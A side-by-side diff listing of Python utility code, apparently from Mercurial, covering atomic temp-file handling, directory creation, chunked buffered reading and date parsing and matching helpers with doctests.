1671 self._checkambig = checkambig
1683 self._checkambig = checkambig
1672
1684
1673 # delegated methods
1685 # delegated methods
1674 self.read = self._fp.read
1686 self.read = self._fp.read
1675 self.write = self._fp.write
1687 self.write = self._fp.write
1676 self.seek = self._fp.seek
1688 self.seek = self._fp.seek
1677 self.tell = self._fp.tell
1689 self.tell = self._fp.tell
1678 self.fileno = self._fp.fileno
1690 self.fileno = self._fp.fileno
1679
1691
1680 def close(self):
1692 def close(self):
1681 if not self._fp.closed:
1693 if not self._fp.closed:
1682 self._fp.close()
1694 self._fp.close()
1683 filename = localpath(self.__name)
1695 filename = localpath(self.__name)
1684 oldstat = self._checkambig and filestat.frompath(filename)
1696 oldstat = self._checkambig and filestat.frompath(filename)
1685 if oldstat and oldstat.stat:
1697 if oldstat and oldstat.stat:
1686 rename(self._tempname, filename)
1698 rename(self._tempname, filename)
1687 newstat = filestat.frompath(filename)
1699 newstat = filestat.frompath(filename)
1688 if newstat.isambig(oldstat):
1700 if newstat.isambig(oldstat):
1689 # stat of changed file is ambiguous to original one
1701 # stat of changed file is ambiguous to original one
1690 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1702 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1691 os.utime(filename, (advanced, advanced))
1703 os.utime(filename, (advanced, advanced))
1692 else:
1704 else:
1693 rename(self._tempname, filename)
1705 rename(self._tempname, filename)
1694
1706
1695 def discard(self):
1707 def discard(self):
1696 if not self._fp.closed:
1708 if not self._fp.closed:
1697 try:
1709 try:
1698 os.unlink(self._tempname)
1710 os.unlink(self._tempname)
1699 except OSError:
1711 except OSError:
1700 pass
1712 pass
1701 self._fp.close()
1713 self._fp.close()
1702
1714
1703 def __del__(self):
1715 def __del__(self):
1704 if safehasattr(self, '_fp'): # constructor actually did something
1716 if safehasattr(self, '_fp'): # constructor actually did something
1705 self.discard()
1717 self.discard()
1706
1718
1707 def __enter__(self):
1719 def __enter__(self):
1708 return self
1720 return self
1709
1721
1710 def __exit__(self, exctype, excvalue, traceback):
1722 def __exit__(self, exctype, excvalue, traceback):
1711 if exctype is not None:
1723 if exctype is not None:
1712 self.discard()
1724 self.discard()
1713 else:
1725 else:
1714 self.close()
1726 self.close()
1715
1727
1716 def unlinkpath(f, ignoremissing=False):
1728 def unlinkpath(f, ignoremissing=False):
1717 """unlink and remove the directory if it is empty"""
1729 """unlink and remove the directory if it is empty"""
1718 if ignoremissing:
1730 if ignoremissing:
1719 tryunlink(f)
1731 tryunlink(f)
1720 else:
1732 else:
1721 unlink(f)
1733 unlink(f)
1722 # try removing directories that might now be empty
1734 # try removing directories that might now be empty
1723 try:
1735 try:
1724 removedirs(os.path.dirname(f))
1736 removedirs(os.path.dirname(f))
1725 except OSError:
1737 except OSError:
1726 pass
1738 pass
1727
1739
1728 def tryunlink(f):
1740 def tryunlink(f):
1729 """Attempt to remove a file, ignoring ENOENT errors."""
1741 """Attempt to remove a file, ignoring ENOENT errors."""
1730 try:
1742 try:
1731 unlink(f)
1743 unlink(f)
1732 except OSError as e:
1744 except OSError as e:
1733 if e.errno != errno.ENOENT:
1745 if e.errno != errno.ENOENT:
1734 raise
1746 raise
1735
1747
1736 def makedirs(name, mode=None, notindexed=False):
1748 def makedirs(name, mode=None, notindexed=False):
1737 """recursive directory creation with parent mode inheritance
1749 """recursive directory creation with parent mode inheritance
1738
1750
1739 Newly created directories are marked as "not to be indexed by
1751 Newly created directories are marked as "not to be indexed by
1740 the content indexing service", if ``notindexed`` is specified
1752 the content indexing service", if ``notindexed`` is specified
1741 for "write" mode access.
1753 for "write" mode access.
1742 """
1754 """
1743 try:
1755 try:
1744 makedir(name, notindexed)
1756 makedir(name, notindexed)
1745 except OSError as err:
1757 except OSError as err:
1746 if err.errno == errno.EEXIST:
1758 if err.errno == errno.EEXIST:
1747 return
1759 return
1748 if err.errno != errno.ENOENT or not name:
1760 if err.errno != errno.ENOENT or not name:
1749 raise
1761 raise
1750 parent = os.path.dirname(os.path.abspath(name))
1762 parent = os.path.dirname(os.path.abspath(name))
1751 if parent == name:
1763 if parent == name:
1752 raise
1764 raise
1753 makedirs(parent, mode, notindexed)
1765 makedirs(parent, mode, notindexed)
1754 try:
1766 try:
1755 makedir(name, notindexed)
1767 makedir(name, notindexed)
1756 except OSError as err:
1768 except OSError as err:
1757 # Catch EEXIST to handle races
1769 # Catch EEXIST to handle races
1758 if err.errno == errno.EEXIST:
1770 if err.errno == errno.EEXIST:
1759 return
1771 return
1760 raise
1772 raise
1761 if mode is not None:
1773 if mode is not None:
1762 os.chmod(name, mode)
1774 os.chmod(name, mode)
1763
1775
1764 def readfile(path):
1776 def readfile(path):
1765 with open(path, 'rb') as fp:
1777 with open(path, 'rb') as fp:
1766 return fp.read()
1778 return fp.read()
1767
1779
1768 def writefile(path, text):
1780 def writefile(path, text):
1769 with open(path, 'wb') as fp:
1781 with open(path, 'wb') as fp:
1770 fp.write(text)
1782 fp.write(text)
1771
1783
1772 def appendfile(path, text):
1784 def appendfile(path, text):
1773 with open(path, 'ab') as fp:
1785 with open(path, 'ab') as fp:
1774 fp.write(text)
1786 fp.write(text)
1775
1787
1776 class chunkbuffer(object):
1788 class chunkbuffer(object):
1777 """Allow arbitrary sized chunks of data to be efficiently read from an
1789 """Allow arbitrary sized chunks of data to be efficiently read from an
1778 iterator over chunks of arbitrary size."""
1790 iterator over chunks of arbitrary size."""
1779
1791
1780 def __init__(self, in_iter):
1792 def __init__(self, in_iter):
1781 """in_iter is the iterator that's iterating over the input chunks."""
1793 """in_iter is the iterator that's iterating over the input chunks."""
1782 def splitbig(chunks):
1794 def splitbig(chunks):
1783 for chunk in chunks:
1795 for chunk in chunks:
1784 if len(chunk) > 2**20:
1796 if len(chunk) > 2**20:
1785 pos = 0
1797 pos = 0
1786 while pos < len(chunk):
1798 while pos < len(chunk):
1787 end = pos + 2 ** 18
1799 end = pos + 2 ** 18
1788 yield chunk[pos:end]
1800 yield chunk[pos:end]
1789 pos = end
1801 pos = end
1790 else:
1802 else:
1791 yield chunk
1803 yield chunk
1792 self.iter = splitbig(in_iter)
1804 self.iter = splitbig(in_iter)
1793 self._queue = collections.deque()
1805 self._queue = collections.deque()
1794 self._chunkoffset = 0
1806 self._chunkoffset = 0
1795
1807
1796 def read(self, l=None):
1808 def read(self, l=None):
1797 """Read L bytes of data from the iterator of chunks of data.
1809 """Read L bytes of data from the iterator of chunks of data.
1798 Returns less than L bytes if the iterator runs dry.
1810 Returns less than L bytes if the iterator runs dry.
1799
1811
1800 If size parameter is omitted, read everything"""
1812 If size parameter is omitted, read everything"""
1801 if l is None:
1813 if l is None:
1802 return ''.join(self.iter)
1814 return ''.join(self.iter)
1803
1815
1804 left = l
1816 left = l
1805 buf = []
1817 buf = []
1806 queue = self._queue
1818 queue = self._queue
1807 while left > 0:
1819 while left > 0:
1808 # refill the queue
1820 # refill the queue
1809 if not queue:
1821 if not queue:
1810 target = 2**18
1822 target = 2**18
1811 for chunk in self.iter:
1823 for chunk in self.iter:
1812 queue.append(chunk)
1824 queue.append(chunk)
1813 target -= len(chunk)
1825 target -= len(chunk)
1814 if target <= 0:
1826 if target <= 0:
1815 break
1827 break
1816 if not queue:
1828 if not queue:
1817 break
1829 break
1818
1830
1819 # The easy way to do this would be to queue.popleft(), modify the
1831 # The easy way to do this would be to queue.popleft(), modify the
1820 # chunk (if necessary), then queue.appendleft(). However, for cases
1832 # chunk (if necessary), then queue.appendleft(). However, for cases
1821 # where we read partial chunk content, this incurs 2 dequeue
1833 # where we read partial chunk content, this incurs 2 dequeue
1822 # mutations and creates a new str for the remaining chunk in the
1834 # mutations and creates a new str for the remaining chunk in the
1823 # queue. Our code below avoids this overhead.
1835 # queue. Our code below avoids this overhead.
1824
1836
1825 chunk = queue[0]
1837 chunk = queue[0]
1826 chunkl = len(chunk)
1838 chunkl = len(chunk)
1827 offset = self._chunkoffset
1839 offset = self._chunkoffset
1828
1840
1829 # Use full chunk.
1841 # Use full chunk.
1830 if offset == 0 and left >= chunkl:
1842 if offset == 0 and left >= chunkl:
1831 left -= chunkl
1843 left -= chunkl
1832 queue.popleft()
1844 queue.popleft()
1833 buf.append(chunk)
1845 buf.append(chunk)
1834 # self._chunkoffset remains at 0.
1846 # self._chunkoffset remains at 0.
1835 continue
1847 continue
1836
1848
1837 chunkremaining = chunkl - offset
1849 chunkremaining = chunkl - offset
1838
1850
1839 # Use all of unconsumed part of chunk.
1851 # Use all of unconsumed part of chunk.
1840 if left >= chunkremaining:
1852 if left >= chunkremaining:
1841 left -= chunkremaining
1853 left -= chunkremaining
1842 queue.popleft()
1854 queue.popleft()
1843 # offset == 0 is enabled by block above, so this won't merely
1855 # offset == 0 is enabled by block above, so this won't merely
1844 # copy via ``chunk[0:]``.
1856 # copy via ``chunk[0:]``.
1845 buf.append(chunk[offset:])
1857 buf.append(chunk[offset:])
1846 self._chunkoffset = 0
1858 self._chunkoffset = 0
1847
1859
1848 # Partial chunk needed.
1860 # Partial chunk needed.
1849 else:
1861 else:
1850 buf.append(chunk[offset:offset + left])
1862 buf.append(chunk[offset:offset + left])
1851 self._chunkoffset += left
1863 self._chunkoffset += left
1852 left -= chunkremaining
1864 left -= chunkremaining
1853
1865
1854 return ''.join(buf)
1866 return ''.join(buf)
1855
1867
1856 def filechunkiter(f, size=131072, limit=None):
1868 def filechunkiter(f, size=131072, limit=None):
1857 """Create a generator that produces the data in the file size
1869 """Create a generator that produces the data in the file size
1858 (default 131072) bytes at a time, up to optional limit (default is
1870 (default 131072) bytes at a time, up to optional limit (default is
1859 to read all data). Chunks may be less than size bytes if the
1871 to read all data). Chunks may be less than size bytes if the
1860 chunk is the last chunk in the file, or the file is a socket or
1872 chunk is the last chunk in the file, or the file is a socket or
1861 some other type of file that sometimes reads less data than is
1873 some other type of file that sometimes reads less data than is
1862 requested."""
1874 requested."""
1863 assert size >= 0
1875 assert size >= 0
1864 assert limit is None or limit >= 0
1876 assert limit is None or limit >= 0
1865 while True:
1877 while True:
1866 if limit is None:
1878 if limit is None:
1867 nbytes = size
1879 nbytes = size
1868 else:
1880 else:
1869 nbytes = min(limit, size)
1881 nbytes = min(limit, size)
1870 s = nbytes and f.read(nbytes)
1882 s = nbytes and f.read(nbytes)
1871 if not s:
1883 if not s:
1872 break
1884 break
1873 if limit:
1885 if limit:
1874 limit -= len(s)
1886 limit -= len(s)
1875 yield s
1887 yield s
1876
1888
1877 def makedate(timestamp=None):
1889 def makedate(timestamp=None):
1878 '''Return a unix timestamp (or the current time) as a (unixtime,
1890 '''Return a unix timestamp (or the current time) as a (unixtime,
1879 offset) tuple based off the local timezone.'''
1891 offset) tuple based off the local timezone.'''
1880 if timestamp is None:
1892 if timestamp is None:
1881 timestamp = time.time()
1893 timestamp = time.time()
1882 if timestamp < 0:
1894 if timestamp < 0:
1883 hint = _("check your clock")
1895 hint = _("check your clock")
1884 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
1896 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
1885 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
1897 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
1886 datetime.datetime.fromtimestamp(timestamp))
1898 datetime.datetime.fromtimestamp(timestamp))
1887 tz = delta.days * 86400 + delta.seconds
1899 tz = delta.days * 86400 + delta.seconds
1888 return timestamp, tz
1900 return timestamp, tz
1889
1901
1890 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
1902 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
1891 """represent a (unixtime, offset) tuple as a localized time.
1903 """represent a (unixtime, offset) tuple as a localized time.
1892 unixtime is seconds since the epoch, and offset is the time zone's
1904 unixtime is seconds since the epoch, and offset is the time zone's
1893 number of seconds away from UTC.
1905 number of seconds away from UTC.
1894
1906
1895 >>> datestr((0, 0))
1907 >>> datestr((0, 0))
1896 'Thu Jan 01 00:00:00 1970 +0000'
1908 'Thu Jan 01 00:00:00 1970 +0000'
1897 >>> datestr((42, 0))
1909 >>> datestr((42, 0))
1898 'Thu Jan 01 00:00:42 1970 +0000'
1910 'Thu Jan 01 00:00:42 1970 +0000'
1899 >>> datestr((-42, 0))
1911 >>> datestr((-42, 0))
1900 'Wed Dec 31 23:59:18 1969 +0000'
1912 'Wed Dec 31 23:59:18 1969 +0000'
1901 >>> datestr((0x7fffffff, 0))
1913 >>> datestr((0x7fffffff, 0))
1902 'Tue Jan 19 03:14:07 2038 +0000'
1914 'Tue Jan 19 03:14:07 2038 +0000'
1903 >>> datestr((-0x80000000, 0))
1915 >>> datestr((-0x80000000, 0))
1904 'Fri Dec 13 20:45:52 1901 +0000'
1916 'Fri Dec 13 20:45:52 1901 +0000'
1905 """
1917 """
1906 t, tz = date or makedate()
1918 t, tz = date or makedate()
1907 if "%1" in format or "%2" in format or "%z" in format:
1919 if "%1" in format or "%2" in format or "%z" in format:
1908 sign = (tz > 0) and "-" or "+"
1920 sign = (tz > 0) and "-" or "+"
1909 minutes = abs(tz) // 60
1921 minutes = abs(tz) // 60
1910 q, r = divmod(minutes, 60)
1922 q, r = divmod(minutes, 60)
1911 format = format.replace("%z", "%1%2")
1923 format = format.replace("%z", "%1%2")
1912 format = format.replace("%1", "%c%02d" % (sign, q))
1924 format = format.replace("%1", "%c%02d" % (sign, q))
1913 format = format.replace("%2", "%02d" % r)
1925 format = format.replace("%2", "%02d" % r)
1914 d = t - tz
1926 d = t - tz
1915 if d > 0x7fffffff:
1927 if d > 0x7fffffff:
1916 d = 0x7fffffff
1928 d = 0x7fffffff
1917 elif d < -0x80000000:
1929 elif d < -0x80000000:
1918 d = -0x80000000
1930 d = -0x80000000
1919 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
1931 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
1920 # because they use the gmtime() system call which is buggy on Windows
1932 # because they use the gmtime() system call which is buggy on Windows
1921 # for negative values.
1933 # for negative values.
1922 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
1934 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
1923 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
1935 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
1924 return s
1936 return s
1925
1937
1926 def shortdate(date=None):
1938 def shortdate(date=None):
1927 """turn (timestamp, tzoff) tuple into iso 8631 date."""
1939 """turn (timestamp, tzoff) tuple into iso 8631 date."""
1928 return datestr(date, format='%Y-%m-%d')
1940 return datestr(date, format='%Y-%m-%d')
1929
1941
1930 def parsetimezone(s):
1942 def parsetimezone(s):
1931 """find a trailing timezone, if any, in string, and return a
1943 """find a trailing timezone, if any, in string, and return a
1932 (offset, remainder) pair"""
1944 (offset, remainder) pair"""
1933
1945
1934 if s.endswith("GMT") or s.endswith("UTC"):
1946 if s.endswith("GMT") or s.endswith("UTC"):
1935 return 0, s[:-3].rstrip()
1947 return 0, s[:-3].rstrip()
1936
1948
1937 # Unix-style timezones [+-]hhmm
1949 # Unix-style timezones [+-]hhmm
1938 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
1950 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
1939 sign = (s[-5] == "+") and 1 or -1
1951 sign = (s[-5] == "+") and 1 or -1
1940 hours = int(s[-4:-2])
1952 hours = int(s[-4:-2])
1941 minutes = int(s[-2:])
1953 minutes = int(s[-2:])
1942 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
1954 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
1943
1955
1944 # ISO8601 trailing Z
1956 # ISO8601 trailing Z
1945 if s.endswith("Z") and s[-2:-1].isdigit():
1957 if s.endswith("Z") and s[-2:-1].isdigit():
1946 return 0, s[:-1]
1958 return 0, s[:-1]
1947
1959
1948 # ISO8601-style [+-]hh:mm
1960 # ISO8601-style [+-]hh:mm
1949 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
1961 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
1950 s[-5:-3].isdigit() and s[-2:].isdigit()):
1962 s[-5:-3].isdigit() and s[-2:].isdigit()):
1951 sign = (s[-6] == "+") and 1 or -1
1963 sign = (s[-6] == "+") and 1 or -1
1952 hours = int(s[-5:-3])
1964 hours = int(s[-5:-3])
1953 minutes = int(s[-2:])
1965 minutes = int(s[-2:])
1954 return -sign * (hours * 60 + minutes) * 60, s[:-6]
1966 return -sign * (hours * 60 + minutes) * 60, s[:-6]
1955
1967
1956 return None, s
1968 return None, s
1957
1969
1958 def strdate(string, format, defaults=None):
1970 def strdate(string, format, defaults=None):
1959 """parse a localized time string and return a (unixtime, offset) tuple.
1971 """parse a localized time string and return a (unixtime, offset) tuple.
1960 if the string cannot be parsed, ValueError is raised."""
1972 if the string cannot be parsed, ValueError is raised."""
1961 if defaults is None:
1973 if defaults is None:
1962 defaults = {}
1974 defaults = {}
1963
1975
1964 # NOTE: unixtime = localunixtime + offset
1976 # NOTE: unixtime = localunixtime + offset
1965 offset, date = parsetimezone(string)
1977 offset, date = parsetimezone(string)
1966
1978
1967 # add missing elements from defaults
1979 # add missing elements from defaults
1968 usenow = False # default to using biased defaults
1980 usenow = False # default to using biased defaults
1969 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
1981 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
1970 part = pycompat.bytestr(part)
1982 part = pycompat.bytestr(part)
1971 found = [True for p in part if ("%"+p) in format]
1983 found = [True for p in part if ("%"+p) in format]
1972 if not found:
1984 if not found:
1973 date += "@" + defaults[part][usenow]
1985 date += "@" + defaults[part][usenow]
1974 format += "@%" + part[0]
1986 format += "@%" + part[0]
1975 else:
1987 else:
1976 # We've found a specific time element, less specific time
1988 # We've found a specific time element, less specific time
1977 # elements are relative to today
1989 # elements are relative to today
1978 usenow = True
1990 usenow = True
1979
1991
1980 timetuple = time.strptime(encoding.strfromlocal(date),
1992 timetuple = time.strptime(encoding.strfromlocal(date),
1981 encoding.strfromlocal(format))
1993 encoding.strfromlocal(format))
1982 localunixtime = int(calendar.timegm(timetuple))
1994 localunixtime = int(calendar.timegm(timetuple))
1983 if offset is None:
1995 if offset is None:
1984 # local timezone
1996 # local timezone
1985 unixtime = int(time.mktime(timetuple))
1997 unixtime = int(time.mktime(timetuple))
1986 offset = unixtime - localunixtime
1998 offset = unixtime - localunixtime
1987 else:
1999 else:
1988 unixtime = localunixtime + offset
2000 unixtime = localunixtime + offset
1989 return unixtime, offset
2001 return unixtime, offset
1990
2002
1991 def parsedate(date, formats=None, bias=None):
2003 def parsedate(date, formats=None, bias=None):
1992 """parse a localized date/time and return a (unixtime, offset) tuple.
2004 """parse a localized date/time and return a (unixtime, offset) tuple.
1993
2005
1994 The date may be a "unixtime offset" string or in one of the specified
2006 The date may be a "unixtime offset" string or in one of the specified
1995 formats. If the date already is a (unixtime, offset) tuple, it is returned.
2007 formats. If the date already is a (unixtime, offset) tuple, it is returned.
1996
2008
1997 >>> parsedate(b' today ') == parsedate(\
2009 >>> parsedate(b' today ') == parsedate(\
1998 datetime.date.today().strftime('%b %d'))
2010 datetime.date.today().strftime('%b %d'))
1999 True
2011 True
2000 >>> parsedate(b'yesterday ') == parsedate((datetime.date.today() -\
2012 >>> parsedate(b'yesterday ') == parsedate((datetime.date.today() -\
2001 datetime.timedelta(days=1)\
2013 datetime.timedelta(days=1)\
2002 ).strftime('%b %d'))
2014 ).strftime('%b %d'))
2003 True
2015 True
2004 >>> now, tz = makedate()
2016 >>> now, tz = makedate()
2005 >>> strnow, strtz = parsedate(b'now')
2017 >>> strnow, strtz = parsedate(b'now')
2006 >>> (strnow - now) < 1
2018 >>> (strnow - now) < 1
2007 True
2019 True
2008 >>> tz == strtz
2020 >>> tz == strtz
2009 True
2021 True
2010 """
2022 """
2011 if bias is None:
2023 if bias is None:
2012 bias = {}
2024 bias = {}
2013 if not date:
2025 if not date:
2014 return 0, 0
2026 return 0, 0
2015 if isinstance(date, tuple) and len(date) == 2:
2027 if isinstance(date, tuple) and len(date) == 2:
2016 return date
2028 return date
2017 if not formats:
2029 if not formats:
2018 formats = defaultdateformats
2030 formats = defaultdateformats
2019 date = date.strip()
2031 date = date.strip()
2020
2032
2021 if date == 'now' or date == _('now'):
2033 if date == 'now' or date == _('now'):
2022 return makedate()
2034 return makedate()
2023 if date == 'today' or date == _('today'):
2035 if date == 'today' or date == _('today'):
2024 date = datetime.date.today().strftime('%b %d')
2036 date = datetime.date.today().strftime('%b %d')
2025 elif date == 'yesterday' or date == _('yesterday'):
2037 elif date == 'yesterday' or date == _('yesterday'):
2026 date = (datetime.date.today() -
2038 date = (datetime.date.today() -
2027 datetime.timedelta(days=1)).strftime('%b %d')
2039 datetime.timedelta(days=1)).strftime('%b %d')
2028
2040
2029 try:
2041 try:
2030 when, offset = map(int, date.split(' '))
2042 when, offset = map(int, date.split(' '))
2031 except ValueError:
2043 except ValueError:
2032 # fill out defaults
2044 # fill out defaults
2033 now = makedate()
2045 now = makedate()
2034 defaults = {}
2046 defaults = {}
2035 for part in ("d", "mb", "yY", "HI", "M", "S"):
2047 for part in ("d", "mb", "yY", "HI", "M", "S"):
2036 # this piece is for rounding the specific end of unknowns
2048 # this piece is for rounding the specific end of unknowns
2037 b = bias.get(part)
2049 b = bias.get(part)
2038 if b is None:
2050 if b is None:
2039 if part[0:1] in "HMS":
2051 if part[0:1] in "HMS":
2040 b = "00"
2052 b = "00"
2041 else:
2053 else:
2042 b = "0"
2054 b = "0"
2043
2055
2044 # this piece is for matching the generic end to today's date
2056 # this piece is for matching the generic end to today's date
2045 n = datestr(now, "%" + part[0:1])
2057 n = datestr(now, "%" + part[0:1])
2046
2058
2047 defaults[part] = (b, n)
2059 defaults[part] = (b, n)
2048
2060
2049 for format in formats:
2061 for format in formats:
2050 try:
2062 try:
2051 when, offset = strdate(date, format, defaults)
2063 when, offset = strdate(date, format, defaults)
2052 except (ValueError, OverflowError):
2064 except (ValueError, OverflowError):
2053 pass
2065 pass
2054 else:
2066 else:
2055 break
2067 break
2056 else:
2068 else:
2057 raise error.ParseError(_('invalid date: %r') % date)
2069 raise error.ParseError(_('invalid date: %r') % date)
2058 # validate explicit (probably user-specified) date and
2070 # validate explicit (probably user-specified) date and
2059 # time zone offset. values must fit in signed 32 bits for
2071 # time zone offset. values must fit in signed 32 bits for
2060 # current 32-bit linux runtimes. timezones go from UTC-12
2072 # current 32-bit linux runtimes. timezones go from UTC-12
2061 # to UTC+14
2073 # to UTC+14
2062 if when < -0x80000000 or when > 0x7fffffff:
2074 if when < -0x80000000 or when > 0x7fffffff:
2063 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2075 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2064 if offset < -50400 or offset > 43200:
2076 if offset < -50400 or offset > 43200:
2065 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2077 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2066 return when, offset
2078 return when, offset
2067
2079
2068 def matchdate(date):
2080 def matchdate(date):
2069 """Return a function that matches a given date match specifier
2081 """Return a function that matches a given date match specifier
2070
2082
2071 Formats include:
2083 Formats include:
2072
2084
2073 '{date}' match a given date to the accuracy provided
2085 '{date}' match a given date to the accuracy provided
2074
2086
2075 '<{date}' on or before a given date
2087 '<{date}' on or before a given date
2076
2088
2077 '>{date}' on or after a given date
2089 '>{date}' on or after a given date
2078
2090
2079 >>> p1 = parsedate(b"10:29:59")
2091 >>> p1 = parsedate(b"10:29:59")
2080 >>> p2 = parsedate(b"10:30:00")
2092 >>> p2 = parsedate(b"10:30:00")
2081 >>> p3 = parsedate(b"10:30:59")
2093 >>> p3 = parsedate(b"10:30:59")
2082 >>> p4 = parsedate(b"10:31:00")
2094 >>> p4 = parsedate(b"10:31:00")
2083 >>> p5 = parsedate(b"Sep 15 10:30:00 1999")
2095 >>> p5 = parsedate(b"Sep 15 10:30:00 1999")
2084 >>> f = matchdate(b"10:30")
2096 >>> f = matchdate(b"10:30")
2085 >>> f(p1[0])
2097 >>> f(p1[0])
2086 False
2098 False
2087 >>> f(p2[0])
2099 >>> f(p2[0])
2088 True
2100 True
2089 >>> f(p3[0])
2101 >>> f(p3[0])
2090 True
2102 True
2091 >>> f(p4[0])
2103 >>> f(p4[0])
2092 False
2104 False
2093 >>> f(p5[0])
2105 >>> f(p5[0])
2094 False
2106 False
2095 """
2107 """
2096
2108
2097 def lower(date):
2109 def lower(date):
2098 d = {'mb': "1", 'd': "1"}
2110 d = {'mb': "1", 'd': "1"}
2099 return parsedate(date, extendeddateformats, d)[0]
2111 return parsedate(date, extendeddateformats, d)[0]
2100
2112
2101 def upper(date):
2113 def upper(date):
2102 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2114 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2103 for days in ("31", "30", "29"):
2115 for days in ("31", "30", "29"):
2104 try:
2116 try:
2105 d["d"] = days
2117 d["d"] = days
2106 return parsedate(date, extendeddateformats, d)[0]
2118 return parsedate(date, extendeddateformats, d)[0]
2107 except Abort:
2119 except Abort:
2108 pass
2120 pass
2109 d["d"] = "28"
2121 d["d"] = "28"
2110 return parsedate(date, extendeddateformats, d)[0]
2122 return parsedate(date, extendeddateformats, d)[0]
2111
2123
2112 date = date.strip()
2124 date = date.strip()
2113
2125
2114 if not date:
2126 if not date:
2115 raise Abort(_("dates cannot consist entirely of whitespace"))
2127 raise Abort(_("dates cannot consist entirely of whitespace"))
2116 elif date[0] == "<":
2128 elif date[0] == "<":
2117 if not date[1:]:
2129 if not date[1:]:
2118 raise Abort(_("invalid day spec, use '<DATE'"))
2130 raise Abort(_("invalid day spec, use '<DATE'"))
2119 when = upper(date[1:])
2131 when = upper(date[1:])
2120 return lambda x: x <= when
2132 return lambda x: x <= when
2121 elif date[0] == ">":
2133 elif date[0] == ">":
2122 if not date[1:]:
2134 if not date[1:]:
2123 raise Abort(_("invalid day spec, use '>DATE'"))
2135 raise Abort(_("invalid day spec, use '>DATE'"))
2124 when = lower(date[1:])
2136 when = lower(date[1:])
2125 return lambda x: x >= when
2137 return lambda x: x >= when
2126 elif date[0] == "-":
2138 elif date[0] == "-":
2127 try:
2139 try:
2128 days = int(date[1:])
2140 days = int(date[1:])
2129 except ValueError:
2141 except ValueError:
2130 raise Abort(_("invalid day spec: %s") % date[1:])
2142 raise Abort(_("invalid day spec: %s") % date[1:])
2131 if days < 0:
2143 if days < 0:
2132 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2144 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2133 % date[1:])
2145 % date[1:])
2134 when = makedate()[0] - days * 3600 * 24
2146 when = makedate()[0] - days * 3600 * 24
2135 return lambda x: x >= when
2147 return lambda x: x >= when
2136 elif " to " in date:
2148 elif " to " in date:
2137 a, b = date.split(" to ")
2149 a, b = date.split(" to ")
2138 start, stop = lower(a), upper(b)
2150 start, stop = lower(a), upper(b)
2139 return lambda x: x >= start and x <= stop
2151 return lambda x: x >= start and x <= stop
2140 else:
2152 else:
2141 start, stop = lower(date), upper(date)
2153 start, stop = lower(date), upper(date)
2142 return lambda x: x >= start and x <= stop
2154 return lambda x: x >= start and x <= stop
2143
2155
2144 def stringmatcher(pattern, casesensitive=True):
2156 def stringmatcher(pattern, casesensitive=True):
2145 """
2157 """
2146 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2158 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2147 returns the matcher name, pattern, and matcher function.
2159 returns the matcher name, pattern, and matcher function.
2148 missing or unknown prefixes are treated as literal matches.
2160 missing or unknown prefixes are treated as literal matches.
2149
2161
2150 helper for tests:
2162 helper for tests:
2151 >>> def test(pattern, *tests):
2163 >>> def test(pattern, *tests):
2152 ... kind, pattern, matcher = stringmatcher(pattern)
2164 ... kind, pattern, matcher = stringmatcher(pattern)
2153 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2165 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2154 >>> def itest(pattern, *tests):
2166 >>> def itest(pattern, *tests):
2155 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2167 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2156 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2168 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2157
2169
2158 exact matching (no prefix):
2170 exact matching (no prefix):
2159 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2171 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2160 ('literal', 'abcdefg', [False, False, True])
2172 ('literal', 'abcdefg', [False, False, True])
2161
2173
2162 regex matching ('re:' prefix)
2174 regex matching ('re:' prefix)
2163 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2175 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2164 ('re', 'a.+b', [False, False, True])
2176 ('re', 'a.+b', [False, False, True])
2165
2177
2166 force exact matches ('literal:' prefix)
2178 force exact matches ('literal:' prefix)
2167 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2179 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2168 ('literal', 're:foobar', [False, True])
2180 ('literal', 're:foobar', [False, True])
2169
2181
2170 unknown prefixes are ignored and treated as literals
2182 unknown prefixes are ignored and treated as literals
2171 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2183 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2172 ('literal', 'foo:bar', [False, False, True])
2184 ('literal', 'foo:bar', [False, False, True])
2173
2185
